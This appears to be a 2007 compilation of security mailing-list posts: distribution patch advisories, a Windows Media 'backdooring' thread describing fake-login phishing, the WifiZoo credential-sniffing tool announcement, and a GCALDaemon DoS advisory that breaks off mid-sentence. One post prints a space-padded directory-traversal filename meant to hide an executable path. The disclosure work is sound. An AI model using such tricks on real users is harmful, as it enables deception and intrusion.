[ GLSA 200709-10 ] PhpWiki: Authentication bypass
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200709-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low Title: PhpWiki: Authentication bypass Date: September 18, 2007 Bugs: #181692 ID: 200709-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability has been discovered in PhpWiki authentication mechanism. Background == PhpWiki is an application that creates a web site where anyone can edit the pages through HTML forms. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-apps/phpwiki < 1.3.14 >= 1.3.14 Description === The PhpWiki development team reported an authentication error within the file lib/WikiUser/LDAP.php when binding to an LDAP server with an empty password. Impact == A remote attacker could provide an empty password when authenticating. Depending on the LDAP implementation used, this could bypass the PhpWiki authentication mechanism and grant the attacker access to the application. Workaround == There is no known workaround at this time. Resolution == All PhpWiki users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-apps/phpwiki-1.3.14" References == [ 1 ] CVE-2007-3193 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3193 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200709-10.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpRXpF84itif.pgp Description: PGP signature
[USN-513-1] Qt vulnerability
=== Ubuntu Security Notice USN-513-1 September 18, 2007 qt-x11-free vulnerability CVE-2007-4137 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libqt3-mt 3:3.3.6-1ubuntu6.4 Ubuntu 6.10: libqt3-mt 3:3.3.6-3ubuntu3.3 Ubuntu 7.04: libqt3-mt 3:3.3.8really3.3.7-0ubuntu5.2 After a standard system upgrade you need to restart your session to affect the necessary changes. Details follow: Dirk Mueller discovered that UTF8 strings could be made to cause a small buffer overflow. A remote attacker could exploit this by sending specially crafted strings to applications that use the Qt3 library for UTF8 processing, potentially leading to arbitrary code execution with user privileges, or a denial of service. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt-x11-free_3.3.6-1ubuntu6.4.diff.gz Size/MD5: 348579 dafbafaf62353848b8ea74f86f144003 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt-x11-free_3.3.6-1ubuntu6.4.dsc Size/MD5: 1686 f7a708df015c1fb710e6676883eba284 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt-x11-free_3.3.6.orig.tar.gz Size/MD5: 17555352 a5597dd9ec6c0f2e29de63179d56b65c Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt3-doc_3.3.6-1ubuntu6.4_all.deb Size/MD5: 5428996 545ef7ec41ca60fe00ad476b7f465d6b http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3-i18n_3.3.6-1ubuntu6.4_all.deb Size/MD5: 132014 3554a72c34bccfaf3dc83d8aebb49e9d http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt3-examples_3.3.6-1ubuntu6.4_all.deb Size/MD5: 1556252 d27df87d4a9c3b8d0c13a67805951c02 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.6-1ubuntu6.4_amd64.deb Size/MD5:81788 d8460d7cf5a48f43980586e5f57add09 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-headers_3.3.6-1ubuntu6.4_amd64.deb Size/MD5: 358304 880cdfc34ce1381b6e0049281a1bebf7 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.6-1ubuntu6.4_amd64.deb Size/MD5:50384 a2dc301992cb5aa4bcd2e4142009b5e3 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-mt_3.3.6-1ubuntu6.4_amd64.deb Size/MD5: 3455014 3bf607d7f032b1415fead79c8f494095 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt3-apps-dev_3.3.6-1ubuntu6.4_amd64.deb Size/MD5: 2707638 020aa316a13f776d4b9c42fed7593593 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt3-dev-tools_3.3.6-1ubuntu6.4_amd64.deb Size/MD5: 1298076 9d163a9baf9d3fbc3b7eca6af05b6123 http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3-mt-mysql_3.3.6-1ubuntu6.4_amd64.deb Size/MD5:55422 dd5003c6d287ec1c9f77749018eb5613 http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3-mt-odbc_3.3.6-1ubuntu6.4_amd64.deb Size/MD5:77386 776de40e3ac5ac4b121ce1ca75cacceb http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3-mt-psql_3.3.6-1ubuntu6.4_amd64.deb Size/MD5:60798 69dfff79895514089b1ae6e9e12519ea http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3-mt-sqlite_3.3.6-1ubuntu6.4_amd64.deb Size/MD5: 225568 395b201f4f2f4d519380a62729f02e14 http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt-x11-free-dbg_3.3.6-1ubuntu6.4_amd64.deb Size/MD5: 32484528 154666f4d06491df7c057135b6114d4f http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt3-assistant_3.3.6-1ubuntu6.4_amd64.deb Size/MD5: 258832 cee2b7336b050cf8f4353ec92e5eef15 http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt3-designer_3.3.6-1ubuntu6.4_amd64.deb Size/MD5: 4148458 be0ec973afe928c62c41082da2dee076 http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt3-dev-tools-compat_3.3.6-1ubuntu6.4_amd64.deb Size/MD5:75462 4649008cc5426f38fda97dd2e25f41c2 http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt3-dev-tools-embedded_3.3.6-1ubuntu6.4_amd64.deb Size/MD5: 297154 34d36938a1ebbaa094a6e6848cc9e55e http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt3-linguist_3.3.6-1ubuntu6.4_amd64.deb Size/MD5: 356420 eb8d462026e1c910f5509b501f381a4a http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt3-qtconfig_3.3.6-
[ GLSA 200709-11 ] GDM: Local Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200709-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low Title: GDM: Local Denial of Service Date: September 18, 2007 Bugs: #187919 ID: 200709-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis GDM can be crashed by a local user, preventing it from managing future displays. Background == GDM is the GNOME display manager. Affected packages = --- Package / Vulnerable / Unaffected --- 1 gnome-base/gdm < 2.18.4>= 2.18.4 *>= 2.16.7 Description === The result of a g_strsplit() call is incorrectly parsed in the files daemon/gdm.c, daemon/gdmconfig.c, gui/gdmconfig.c and gui/gdmflexiserver.c, allowing for a null pointer dereference. Impact == A local user could send a crafted message to /tmp/.gdm_socket that would trigger the null pointer dereference and crash GDM, thus preventing it from managing future displays. Workaround == Restrict the write permissions on /tmp/.gdm_socket to trusted users only after each GDM restart. Resolution == All GDM users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose "gnome-base/gdm" References == [ 1 ] CVE-2007-3381 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3381 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200709-11.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgp21fuCRyNnf.pgp Description: PGP signature
A little advisory content correction.
There is a small mistake in the line: readme.txt /../../../../../../../../asdf.exe This filename originally looks like: readme.txt <40 spaces here> /../../../../../../../../asdf.exe What I mean, is that only the "readme.txt" part of path is visible for the user, and the directory traversal string can be easily hidden in this way. The forty space characters aren't displayed correctly due to the fact that they are shortened to one space by the browser. j00ru
Uninformed Journal Release Announcement: Volume 8
Uninformed is pleased to announce the release of its eighth volume. This volume includes 6 articles on a variety of topics: - Covert Communications: Real-time Steganography with RTP Author: I)ruid - Engineering in Reverse: PatchGuard Reloaded: A Brief Analysis of PatchGuard Version 3 Author: Skywing - Exploitation Technology: Getting out of Jail: Escaping Internet Explorer Protected Mode Author: Skywing - Exploitation Technology: OS X Kernel-mode Exploitation in a Weekend Author: David Maynor - Rootkits: A Catalog of Local Windows Kernel-mode Backdoor Techniques Authors: skape & Skywing - Static Analysis: Generalizing Data Flow Information Author: skape This volume of the journal can be found at: http://www.uninformed.org/?v=8 About Uninformed: Uninformed is a non-commercial technical outlet for research in areas pertaining to security technologies, reverse engineering, and low level programming. The goal, as the name implies, is to act as a medium for providing informative information to the uninformed. The research presented in each edition is simply an example of the evolutionary thought that affects all academic and professional disciplines. - The Uninformed Staff staff [at] uninformed.org
Re: security notice: Backdooring Windows Media Files
yes, of course :) but u are running Windows Media Player 11 which is not the default one for Windows XP SP2. Moreover, this Media Player edition is not slipped through any software update either. Therefore, if you are not a Media Player fan, you will never get this version on a fully patched XP SP2 machine. I tend to use iTunes on XP SP2, so yes I am vulnerable. On 9/18/07, Memisyazici, Aras <[EMAIL PROTECTED]> wrote: > Hi pdp! > > Great admirer of your work :) I just wanted to inform you that I have > tested your claim, on a fully patched/updated Win XP SP2 system with an > admin account logged in, and was warned sufficiently(asked whether I > wanted to play asx files, then asked if I was sure by Media Player, then > pop-up was blocked by IE), while the page you tried to produce was > blocked via IE's pop-up blocker. > > You can see/confirm this by viewing these screenshots: > > http://preview.tinyurl.com/34xpcz > (http://i189.photobucket.com/albums/z159/vtknightmare/noworkie1.png ) > > and > > http://preview.tinyurl.com/34jx5v > (http://i189.photobucket.com/albums/z159/vtknightmare/noworkie2.png ) > > This was tested on a plain/manila/vanilla version of XP SP2. All I did > was update/upgrade to latest available from M$ Update. > > Sincerely, > Aras Memisyazici > IT/Security/Dev. Specialist > > Outreach Information Services > Virginia Tech > > -Original Message- > From: pdp (architect) [mailto:[EMAIL PROTECTED] > Sent: Tuesday, September 18, 2007 11:58 AM > To: bugtraq@securityfocus.com; [EMAIL PROTECTED] > Subject: security notice: Backdooring Windows Media Files > > http://www.gnucitizen.org/blog/backdooring-windows-media-files > > It is very easy to put some HTML inside files supported by Window > Media Player. The interesting thing is that these HTML pages run in > less restrictive IE environment. I found that a fully patched windows > XP SP2 with IE6 or IE7 and Windows Media Player 9 (default) will open > any page of your choice in IE even if your default browser is Firefox, > Opera or anything else you have in place. It means that even if you > are running Firefox and you think that you are secure, by simply > opening a media file, you expose yourself to all IE vulnerabilities > there might be. Plus, attackers can perform very very interesting > phishing attacks. I prepared a simple POC which spawns a browser > window in full screen mode... Think about how easy it is going to be > to fake the windows logout - login sequence and phish unaware users' > credentials > > http://www.gnucitizen.org/projects/backdooring-windows-media-files/poc02 > .asx > > On the other hand Media Player 11 (Vista by default) is not exposed to > these attacks. > > -- > pdp (architect) | petko d. petkov > http://www.gnucitizen.org > -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
RE: security notice: Backdooring Windows Media Files
Err... Windows Media Player 11 update DOES come through on M$ Update. Of course not via the Express mode, but via Custom mode. It is a recommended update. When someone tells me "they have fully patched their system" I am assuming that they have applied any and all patched available from M$ without discrimination. -Original Message- From: pdp (architect) [mailto:[EMAIL PROTECTED] Sent: Tuesday, September 18, 2007 3:00 PM To: Memisyazici, Aras Cc: bugtraq@securityfocus.com; [EMAIL PROTECTED] Subject: Re: security notice: Backdooring Windows Media Files yes, of course :) but u are running Windows Media Player 11 which is not the default one for Windows XP SP2. Moreover, this Media Player edition is not slipped through any software update either. Therefore, if you are not a Media Player fan, you will never get this version on a fully patched XP SP2 machine. I tend to use iTunes on XP SP2, so yes I am vulnerable. On 9/18/07, Memisyazici, Aras <[EMAIL PROTECTED]> wrote: > Hi pdp! > > Great admirer of your work :) I just wanted to inform you that I have > tested your claim, on a fully patched/updated Win XP SP2 system with an > admin account logged in, and was warned sufficiently(asked whether I > wanted to play asx files, then asked if I was sure by Media Player, then > pop-up was blocked by IE), while the page you tried to produce was > blocked via IE's pop-up blocker. > > You can see/confirm this by viewing these screenshots: > > http://preview.tinyurl.com/34xpcz > (http://i189.photobucket.com/albums/z159/vtknightmare/noworkie1.png ) > > and > > http://preview.tinyurl.com/34jx5v > (http://i189.photobucket.com/albums/z159/vtknightmare/noworkie2.png ) > > This was tested on a plain/manila/vanilla version of XP SP2. All I did > was update/upgrade to latest available from M$ Update. > > Sincerely, > Aras Memisyazici > IT/Security/Dev. Specialist > > Outreach Information Services > Virginia Tech > > -Original Message- > From: pdp (architect) [mailto:[EMAIL PROTECTED] > Sent: Tuesday, September 18, 2007 11:58 AM > To: bugtraq@securityfocus.com; [EMAIL PROTECTED] > Subject: security notice: Backdooring Windows Media Files > > http://www.gnucitizen.org/blog/backdooring-windows-media-files > > It is very easy to put some HTML inside files supported by Window > Media Player. The interesting thing is that these HTML pages run in > less restrictive IE environment. I found that a fully patched windows > XP SP2 with IE6 or IE7 and Windows Media Player 9 (default) will open > any page of your choice in IE even if your default browser is Firefox, > Opera or anything else you have in place. It means that even if you > are running Firefox and you think that you are secure, by simply > opening a media file, you expose yourself to all IE vulnerabilities > there might be. Plus, attackers can perform very very interesting > phishing attacks. I prepared a simple POC which spawns a browser > window in full screen mode... Think about how easy it is going to be > to fake the windows logout - login sequence and phish unaware users' > credentials > > http://www.gnucitizen.org/projects/backdooring-windows-media-files/poc02 > .asx > > On the other hand Media Player 11 (Vista by default) is not exposed to > these attacks. > > -- > pdp (architect) | petko d. petkov > http://www.gnucitizen.org > -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
RE: security notice: Backdooring Windows Media Files
Hi pdp! Great admirer of your work :) I just wanted to inform you that I have tested your claim, on a fully patched/updated Win XP SP2 system with an admin account logged in, and was warned sufficiently(asked whether I wanted to play asx files, then asked if I was sure by Media Player, then pop-up was blocked by IE), while the page you tried to produce was blocked via IE's pop-up blocker. You can see/confirm this by viewing these screenshots: http://preview.tinyurl.com/34xpcz (http://i189.photobucket.com/albums/z159/vtknightmare/noworkie1.png ) and http://preview.tinyurl.com/34jx5v (http://i189.photobucket.com/albums/z159/vtknightmare/noworkie2.png ) This was tested on a plain/manila/vanilla version of XP SP2. All I did was update/upgrade to latest available from M$ Update. Sincerely, Aras Memisyazici IT/Security/Dev. Specialist Outreach Information Services Virginia Tech -Original Message- From: pdp (architect) [mailto:[EMAIL PROTECTED] Sent: Tuesday, September 18, 2007 11:58 AM To: bugtraq@securityfocus.com; [EMAIL PROTECTED] Subject: security notice: Backdooring Windows Media Files http://www.gnucitizen.org/blog/backdooring-windows-media-files It is very easy to put some HTML inside files supported by Window Media Player. The interesting thing is that these HTML pages run in less restrictive IE environment. I found that a fully patched windows XP SP2 with IE6 or IE7 and Windows Media Player 9 (default) will open any page of your choice in IE even if your default browser is Firefox, Opera or anything else you have in place. It means that even if you are running Firefox and you think that you are secure, by simply opening a media file, you expose yourself to all IE vulnerabilities there might be. Plus, attackers can perform very very interesting phishing attacks. I prepared a simple POC which spawns a browser window in full screen mode... Think about how easy it is going to be to fake the windows logout - login sequence and phish unaware users' credentials http://www.gnucitizen.org/projects/backdooring-windows-media-files/poc02 .asx On the other hand Media Player 11 (Vista by default) is not exposed to these attacks. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
RE: Re[2]: [Full-disclosure] Next generation malware: Windows Vista's gadget API
Sirs, The lack of a defense vector doesn't translate magically to a new attack vector. The absence of common security mitigating controls is referred to as a vulnerability. Really all old attack vectors apply. The secure design model for this type of application should be a sandboxed by zone. The vulnerability is that the code is implicitly trusted no sandbox implemented and of course it will be difficult to hold evil gadget creators to task due to the transparent lack of any accountability by everyone. Fingers are already flying. The issue is all about an un-sandboxed application where standard best practices use and vast prior experience should have dictated it should have been sand boxed. This is a divestiture away from signed controls and towards 3rd party security programs. So once again we have no sandbox mitigating controls coupled with a firm lack of accountability per gadget means breached operating systems. Those who have additional security programs largely make up the difference and those who don't will always be wondering why and how the vendor let them get pwned. >(As you say, I think we'll have to agree to disagree on this one. Let's wait >until the phishers discover it and then revisit the topic :-). I think bot herders will have a field day collecting new devices with this. Ed -Original Message- From: pgut001 [mailto:[EMAIL PROTECTED] Sent: Tuesday, September 18, 2007 6:30 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: bugtraq@securityfocus.com; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: Re[2]: [Full-disclosure] Next generation malware: Windows Vista's gadget API "Roger A. Grimes" <[EMAIL PROTECTED]> writes: >I'm sorry, we'll have to agree to disagree. I don't see the new attack vector >here. I, the attacker, have to make you download my malicious trojan program, >which you install on your computer. It's not so much the attack vector, it's the usability issue. This makes it just too easy to convince users to download and execute untrusted content. >But if you're worried that your users will click past 3 to 5 warning messages >to install untrusted gadgets (which they will), then completely control them >using group policy. On Joe Sixpack's PC in his den? (As you say, I think we'll have to agree to disagree on this one. Let's wait until the phishers discover it and then revisit the topic :-). Peter
WifiZoo v1.1
Hi All!, So I was looking for something cool to do, didn't find anything, and wrote WifiZoo because I kind of needed it at the moment :). WifiZoo is a tool to gather 'wifi' information passively. Is like dsniff, but dsniff didn't work well (probably my fault) in the scenario I wanted to use it (wifi card, monitor mode, listening for everything, not associated to any AP, hopping channels all the time) and also lacked some wifi specific stuff I needed. is like Ferret, but WifiZoo is written in python and not in C, this for me makes it so much easier to maintain and modify, and WifiZoo also does some stuff Ferret does not do (and viceversa :)). Of course, kudos to the previous tools because they are the predecessors of this 'tool', 'group of python scripts' or whatever you want to call it :). WifiZoo does the following: -gathers bssid->ssid information from beacons and probe responses *(now the graph contains the ssid of the bssid :), new in v1.1)* -gathers list of unique SSIDS found on probe requests (you can keep track of all SSIDS machines around you are probing for, and use this information on further attacks)*new in v1.1* -gathers the list and graphs which SSIDS are being probed from what sources *new in v1.1* -gathers bssid->clients information and outputs it in a file that you can later use with graphviz and get a graph with "802.11 bssids->clients". It gathers both src and dst addresses of packets to make the list of clients so sometimes you get weird graphs that are fun to analyze :) (basically, because I still need to omit multicast dst addresses and things like that). Using the dst address means that sometimes you get mac addresses of wifi devices that are not near you, but I think gives you information about the wifi 'infrastructure', again, I think :). -gathers 'useful' information from unencrypted wifi traffic (ala Ferret,and dsniff, etc); like pop3 credentials, smtp traffic, http cookies/authinfo, msn messages,ftp credentials, telnet network traffic, nbt, etc. -and I think that's it. Requirements: -Linux -scapy -wifi card :) you can get it here, and take a look at some of the graphs it produces (very basic but functional :)): http://community.corest.com/~hochoa/wifizoo/index.html direct link: http://community.corest.com/~hochoa/wifizoo/wifizoo_v1.1.tgz Thanks!, Hernan
Re: security notice: Backdooring Windows Media Files
> Think about how easy it is going to be > to fake the windows logout - login sequence and phish unaware users' > credentials and just how do you propose you catch the SAS with your little IE window?
Plague in (security) software drivers & BSDOhook utility
Hello, We have found number of vulnerabilities in implementations of SSDT hooks in many different products. Vulnerable software: * BlackICE PC Protection 3.6.cqn * G DATA InternetSecurity 2007 * Ghost Security Suite beta 1.110 and alpha 1.200 * Kaspersky Internet Security 7.0.0.125 * Norton Internet Security 2008 15.0.0.60 * Online Armor Personal Firewall 2.0.1.215 * Outpost Firewall Pro 4.0.1025.7828 * Privatefirewall 5.0.14.2 * Process Monitor 1.22 * ProcessGuard 3.410 * ProSecurity 1.40 Beta 2 * RegMon 7.04 * ZoneAlarm Pro 7.0.362.000 * probably other versions of above mentioned software * possibly many other software products that implement SSDT hooks Not vulnerable software: * Comodo Personal Firewall 2.4.18.184 * Daemon Tools Lite 4.10 X86 * Sunbelt Personal Firewall 4.5.916.0 More details and the BSODhook utility that allows everyone to find similar vulnerabilities easily are available here: Advisory: http://www.matousec.com/info/advisories/plague-in-security-software-drivers.php Article: http://www.matousec.com/projects/windows-personal-firewall-analysis/plague-in-security-software-drivers.php Regards, -- Matousec - Transparent security Research http://www.matousec.com/
security notice: Backdooring Windows Media Files
http://www.gnucitizen.org/blog/backdooring-windows-media-files It is very easy to put some HTML inside files supported by Window Media Player. The interesting thing is that these HTML pages run in less restrictive IE environment. I found that a fully patched windows XP SP2 with IE6 or IE7 and Windows Media Player 9 (default) will open any page of your choice in IE even if your default browser is Firefox, Opera or anything else you have in place. It means that even if you are running Firefox and you think that you are secure, by simply opening a media file, you expose yourself to all IE vulnerabilities there might be. Plus, attackers can perform very very interesting phishing attacks. I prepared a simple POC which spawns a browser window in full screen mode... Think about how easy it is going to be to fake the windows logout - login sequence and phish unaware users' credentials http://www.gnucitizen.org/projects/backdooring-windows-media-files/poc02.asx On the other hand Media Player 11 (Vista by default) is not exposed to these attacks. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[ MDKSA-2007:185 ] - Updated avahi packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:185 http://www.mandriva.com/security/ ___ Package : avahi Date: September 17, 2007 Affected: 2007.0, 2007.1 ___ Problem Description: The Avahi daemon in 0.6.20 and previous allows attackers to cause a denial of service via empty TXT data over D-Bus, which triggers an assert error. Updated packages have been patched to prevent this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3372 ___ Updated Packages: Mandriva Linux 2007.0: 9b42ab7d33f6f3645ffb1d8c10f2b7be 2007.0/i586/avahi-0.6.13-4.3mdv2007.0.i586.rpm 3dd8f44477109b6be1937d027c04334f 2007.0/i586/avahi-dnsconfd-0.6.13-4.3mdv2007.0.i586.rpm 61d1ad9658ee265ace14d11ec319feb3 2007.0/i586/avahi-python-0.6.13-4.3mdv2007.0.i586.rpm 4b2442311c56146a8769d271705835a3 2007.0/i586/avahi-sharp-0.6.13-4.3mdv2007.0.i586.rpm 6c65b69658bf5fba762baceb8d54c618 2007.0/i586/avahi-x11-0.6.13-4.3mdv2007.0.i586.rpm 8974d63f0c51d711c64476f23de79091 2007.0/i586/libavahi-client3-0.6.13-4.3mdv2007.0.i586.rpm 653beb7c63bd95a2ff04420ce45cfb3c 2007.0/i586/libavahi-client3-devel-0.6.13-4.3mdv2007.0.i586.rpm d57e3395370d334c3d0389b5d27f69ee 2007.0/i586/libavahi-common3-0.6.13-4.3mdv2007.0.i586.rpm 9033a6df7041a041c994cb69615ba62f 2007.0/i586/libavahi-common3-devel-0.6.13-4.3mdv2007.0.i586.rpm bd4189a93e747941a4b65fb93f7cde38 2007.0/i586/libavahi-compat-howl0-0.6.13-4.3mdv2007.0.i586.rpm 884f7d0baf1af89fe6e397597d41 2007.0/i586/libavahi-compat-howl0-devel-0.6.13-4.3mdv2007.0.i586.rpm 1f50ca143a4fbbf6cada79fc4f736c29 2007.0/i586/libavahi-compat-libdns_sd1-0.6.13-4.3mdv2007.0.i586.rpm b4fbae18da3a0823c073a71b917a36fe 2007.0/i586/libavahi-compat-libdns_sd1-devel-0.6.13-4.3mdv2007.0.i586.rpm 7331d7cde7c5184a0da289639182df6f 2007.0/i586/libavahi-core4-0.6.13-4.3mdv2007.0.i586.rpm 3a5e26980894b846ebf960d5f50d21cc 2007.0/i586/libavahi-core4-devel-0.6.13-4.3mdv2007.0.i586.rpm b9c5809919acd3fd33c148dfa3c91959 2007.0/i586/libavahi-glib1-0.6.13-4.3mdv2007.0.i586.rpm d42c43448e010d0b75f561d276402dff 2007.0/i586/libavahi-glib1-devel-0.6.13-4.3mdv2007.0.i586.rpm c7f30225b0153e555466b6ee37a857d3 2007.0/i586/libavahi-qt3_1-0.6.13-4.3mdv2007.0.i586.rpm abe726ef80d631e068eef0b73eb1cd76 2007.0/i586/libavahi-qt3_1-devel-0.6.13-4.3mdv2007.0.i586.rpm 263c40aeddc7aa56284dcccd94061b83 2007.0/i586/libavahi-qt4_1-0.6.13-4.3mdv2007.0.i586.rpm 6165066dd59ecd5e965b8cc9a6794b3e 2007.0/i586/libavahi-qt4_1-devel-0.6.13-4.3mdv2007.0.i586.rpm a078edca8e651bd288b99eb071c477a4 2007.0/SRPMS/avahi-0.6.13-4.3mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 32bdcbf34c11d3b568660f1269f7739f 2007.0/x86_64/avahi-0.6.13-4.3mdv2007.0.x86_64.rpm 119731a972772a866be55a8a3794d6e8 2007.0/x86_64/avahi-dnsconfd-0.6.13-4.3mdv2007.0.x86_64.rpm 54bb90936d710ffe021eaa327bf906cc 2007.0/x86_64/avahi-python-0.6.13-4.3mdv2007.0.x86_64.rpm c627d10f177aec68260e96c2fbebf302 2007.0/x86_64/avahi-sharp-0.6.13-4.3mdv2007.0.x86_64.rpm e03e889615e72e05fa159ca33ce8652f 2007.0/x86_64/avahi-x11-0.6.13-4.3mdv2007.0.x86_64.rpm 0818f91e8d83fc4bffd753218b14b7d8 2007.0/x86_64/lib64avahi-client3-0.6.13-4.3mdv2007.0.x86_64.rpm f63e399dee05af7c36fd477a2b1965c5 2007.0/x86_64/lib64avahi-client3-devel-0.6.13-4.3mdv2007.0.x86_64.rpm 96e1032970e9a5df235c9457d69f6363 2007.0/x86_64/lib64avahi-common3-0.6.13-4.3mdv2007.0.x86_64.rpm 027aecd334aadac0c7789b6e70ef96c6 2007.0/x86_64/lib64avahi-common3-devel-0.6.13-4.3mdv2007.0.x86_64.rpm c09888641a61a677cbfad98fe185ce5a 2007.0/x86_64/lib64avahi-compat-howl0-0.6.13-4.3mdv2007.0.x86_64.rpm b202d3105c17842df5280e220e09eceb 2007.0/x86_64/lib64avahi-compat-howl0-devel-0.6.13-4.3mdv2007.0.x86_64.rpm 06b9daaa3516cfd3a11c852a9704a3b2 2007.0/x86_64/lib64avahi-compat-libdns_sd1-0.6.13-4.3mdv2007.0.x86_64.rpm 0f21e479c3adf79e5f2b85317e0543f1 2007.0/x86_64/lib64avahi-compat-libdns_sd1-devel-0.6.13-4.3mdv2007.0.x86_64.rpm aa9db148a186ca2fcd1d248b555962b2 2007.0/x86_64/lib64avahi-core4-0.6.13-4.3mdv2007.0.x86_64.rpm 3e0b6921ea49c48f7ce07a661cab7547 2007.0/x86_64/lib64avahi-core4-devel-0.6.13-4.3mdv2007.0.x86_64.rpm 482416289f4fa44c9802b496b9d32b43 2007.0/x86_64/lib64avahi-glib1-0.6.13-4.3mdv2007.0.x86_64.rpm ee224788f649a439cc7da2b8de29944e 2007.0/x86_64/lib64avahi-glib1-devel-0.6.13-4.3mdv2007.0.x86_64.rpm 53c2ccc7e6c378ee9c79847b17038c40 2007.0/x86_64/lib64avahi-qt3_1-0.6.13-4.3mdv2007.0.x86_64.rpm 21d19035cd5e813004f3cc5cff646087 2007.0/x86_64/lib64avahi-qt3_1-devel-0.6.13-4.3mdv2007.0.x86_6
GCALDaemon Remote DoS
Secure Network - Security Research Advisory
Vuln name: GCALDaemon Remote DoS
Systems affected: GCALDaemon 1.0-beta13 (all platforms)
Systems not affected: -
Severity: Low
Local/Remote: Remote
Vendor URL: http://gcaldaemon.sourceforge.net/
Author(s): Luca "ikki" Carettoni - [EMAIL PROTECTED]
Vendor disclosure: 22nd August 2007
Vendor acknowledged: 22nd August 2007
Vendor patch release: n/a
Public disclosure: 18th September 2007
Advisory number: SN-2007-01
Advisory URL: http://www.securenetwork.it/advisories/, http://www.ikkisoft.com
*** SUMMARY ***
GCALDaemon is an OS-independent Java program that offers two-way
synchronization between Google Calendar and various iCalendar compatible
calendar applications. GCALDaemon is primarily designed as a calendar
synchronizer but it can also be used as a Gmail notifier, Address Book
importer, Gmail terminal and RSS feed converter.
Sunbird/Kontact/Firefox/ThunderBird/Mozilla Calendar all share calendars over
HTTP, by uploading their file via an HTTP PUT and getting/refreshing their
calendar with an HTTP GET. The GCALDaemon's built-in HTTP server keeps this
HTTP messages in sync with a specified Google Calendar. An input validation
flaw permits to craft an HTTP request with an abnormal content-length value;
this malformed request could trigger a denial of service that arises from a
Java out of memory fatal error.
*** VULNERABILITY DETAILS ***
Using a crafted HTTP request, an attacker could trigger a denial of service
that arises from a java.lang.OutOfMemoryError when the Java heap space is
overfilled.
In the file "org/gcaldaemon/core/http/HTTPListener.java", the GCALDaemon's
built-in HTTP server parses the HTTP request and the HTTP header parameters
without validation checkpoints.
In the line of code "490:org/gcaldaemon/core/http/HTTPListener.java" the
